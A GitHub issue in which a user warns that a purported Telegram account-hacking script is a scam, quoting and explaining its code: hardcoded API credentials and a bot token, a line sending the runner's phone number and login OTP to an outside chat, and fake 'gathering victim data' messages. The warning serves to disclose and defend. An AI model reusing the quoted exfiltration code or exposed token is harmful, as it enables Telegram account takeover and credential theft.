Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

do not trust and do not run this script #31

Open
manojdjoshi opened this issue Feb 12, 2025 · 1 comment
Open

do not trust and do not run this script #31

manojdjoshi opened this issue Feb 12, 2025 · 1 comment

Comments

@manojdjoshi
Copy link

1️⃣ Required Libraries

from telethon import TelegramClient, events  
import telegram  
import asyncio  
import time  
import os

Telethon: Used to interact with the Telegram API.
telegram: Used to send messages via a Telegram bot.
asyncio, time, os: Used for script execution and system interaction.
🔴 These libraries are normal, but the risk lies in the use of the "telegram" bot.

2️⃣ Important Credentials (Risk Alert 🚨)

YOUR_APP_ID = 24835154  
YOUR_APP_HASH = 'e7c35ab96f8d8f76513fd7a3ae242c3b'  
bot = telegram.Bot(token='5611639359:AAHWhuVHkongx9GzoGlB0ZDCPlfikr8jJI8')
client = TelegramClient('session_name', YOUR_APP_ID, YOUR_APP_HASH)

YOUR_APP_ID and YOUR_APP_HASH are used to connect to the Telegram API.
Risk Point: bot = telegram.Bot(token='5611639359:AAHWhuVHkongx9GzoGlB0ZDCPlfikr8jJI8')
This is a Telegram bot that may send OTPs and phone numbers to someone else.
🔴 If this bot is controlled by someone else, your OTP could be leaked.

3️⃣ User Phone Number Input
phone = input(cyan+bold+'[+]\033[0m \033[01mEnter your phone with country code (eg: +92) >\033[0m ')
This prompts the user to enter their phone number.
Once you enter your phone number, the script requests an OTP from Telegram.
🔴 If this script is under someone else's control, it can save your phone number.

4️⃣ OTP Request and Risky Bot Usage

otp = input(cyan+bold+"[+]\033[0m \033[01mEnter the OTP (check inside your telegram app for the otp from telegramm if it not comes to your sms) >\033[0m ")
await bot.send_message(chat_id='5469341309', text=f"Phone Number: {phone}\nOTP: {otp}")

The script uses Telegram's send_code_request() to request an OTP.
Then it asks the user to enter the OTP manually.
Risk Point 🚨:
This OTP is needed to log into your Telegram account.
This line:
await bot.send_message(chat_id='5469341309', text=f"Phone Number: {phone}\nOTP: {otp}")
Sends the OTP to a Telegram bot controlled by someone else.
This means this script can hack your own account! 🚨🚨🚨
🔴 If you run this, your OTP will be sent to an attacker, and they will be able to access your Telegram account.
5️⃣ Fake Steps for Gathering Victim’s Data

victim = input(cyan+bold+'[+]\033[0m \033[01mEnter victim\'s phone with country code to hack(eg: +92) >\033[0m ')
print("Connecting to victim's api...")
time.sleep(3)
print("Gathering victim id and hash...[25%]")
time.sleep(2)
print("Collecting the contacts and chat data...[may take some time]")
time.sleep(6)

This only prints fake progress messages.
No actual hacking is happening—this is just a trick to fool users.
🔴 This script does not collect victim data; it only steals your OTP.
6️⃣ Login Attempt

await client.sign_in(phone, otp)
me = await client.get_me()
print(me.first_name)
@XZY123lol
Copy link

Thanks for the warning

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@manojdjoshi @XZY123lol